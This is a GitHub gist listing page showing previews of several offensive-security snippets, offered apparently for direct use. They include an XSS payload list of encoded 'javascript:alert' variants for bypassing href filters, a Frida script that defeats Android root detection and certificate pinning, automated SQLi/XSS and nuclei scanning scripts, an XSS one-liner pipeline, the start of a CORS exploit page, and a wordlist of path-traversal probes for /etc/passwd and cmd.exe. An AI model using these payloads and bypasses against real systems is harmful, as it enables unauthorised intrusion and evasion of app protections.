Skip to content

Instantly share code, notes, and snippets.

View secfb's full-sized avatar
🎯
Focusing

Never Mind secfb

🎯
Focusing
92 followers · 541 following
View GitHub Profile
@hackerscrolls
hackerscrolls / href_bypass.html
Last active April 14, 2025 08:18
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
@rootsec1
rootsec1 / fridascript.js
Last active March 25, 2024 07:26
Bypass SSL certificate pinning and evade root detection on Android (Frida script)
Java.perform(function () {
console.log("\nRoot detection bypass with Frida");
var CommonUtils = Java.use("io.fabric.sdk.android.services.common.CommonUtils");
console.log("\nHijacking isRooted function in CommonUtils class");
CommonUtils.isRooted.implementation = function () {
console.log("\nInside the isRooted function");
return false;
};
console.log("\nRoot detection bypassed");
console.log("\n");
@dwisiswant0
dwisiswant0 / .bash_profile
Created May 27, 2020 07:38
SQLi & XSS Vulnerability Scanner
###
# ▶ go get -u github.com/lc/gau
# ▶ go get -u github.com/tomnomnom/qsreplace
# ▶ go get -u github.com/tomnomnom/hacks/kxss
# ▶ go get -u github.com/hahwul/dalfox
# ▶ git clone https://github.com/dwisiswant0/DSSS
###
gauq() {
@dwisiswant0
dwisiswant0 / nuclei-scan.sh
Last active July 8, 2022 13:46
Automate nuclei for given hosts
#!/bin/bash
OUT="~/nuclei-results/$1"
TPL="~/nuclei-templates"
mkdir -p ${OUT}
SUB=$(subfinder -d $1 -silent | httprobe | tee ${OUT}/$1.txt)
cd ${TPL}; git pull origin master && cd -
for tpl in $(find $TPL -name "*.yaml"); do $GOPATH/bin/nuclei -l ${OUT}/$1.txt -t $tpl -o "${OUT}/$(basename "$tpl" .yaml).txt"; done
find ${OUT} -name "*.txt" -size 0 -delete
@cihanmehmet
cihanmehmet / subdomain_wordlist.md
Last active August 24, 2025 08:37
Subdomain Wordlist
@5bhuv4n35h
5bhuv4n35h / install.sh
Last active July 27, 2020 12:17
pentest setup backup shell script to install sublime,typora,shellter,wine,figlet,lolcat,gobuster automatically using linux commands #oscp #pentest #documentation #tools
#!/bin/bash
##### (Cosmetic) Colour output
RED="\033[01;31m" # Issues/Errors
GREEN="\033[01;32m" # Success
YELLOW="\033[01;33m" # Warnings/Information
BLUE="\033[01;34m" # Heading
BOLD="\033[01;01m" # Highlight
RESET="\033[00m" # Normal
@cihanmehmet
cihanmehmet / xss_one_liner.md
Last active July 9, 2025 16:03
xss_one_liner.md 
#cat targets_urls.txt                
http://public-firing-range.appspot.com

Command Line

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
@Parasimpaticki
Parasimpaticki / gist:0b1f1f508b2ee2a146244ab53d0bb3b8
Created May 6, 2020 23:22
#!/bin/bash
#Escape slash from name for folder name
folderName=$(echo $1| awk '{gsub("/","_")}1');
mkdir $folderName && cd $folderName
fqdn=$1;
ipList=$(dig +short $fqdn|grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'); #Get all A names
if [ -z "$ipList" ]
then
ipArgument=$fqdn
@securITymania
securITymania / cors_poc.html
Created April 5, 2020 13:43
<!DOCTYPE html>
<html>
<head>
<title>CORS PoC Exploit</title>
</head>
<body>
<center>
<h1>CORS Exploit<br>secureITmania</h1>
<hr>
@nullenc0de
nullenc0de / qualys_wordlist.txt
Created March 29, 2020 18:25
Qualys Wordlist
/
/.
/.*
/../../../../../../../../../../../
/../../../../../../../../../../../../boot.ini
/../../../../../../../../../../../../etc/passwd
/../../../../../../../winnt/system32/cmd.exe
/../../..//index.html
/../index.html
/.bzr/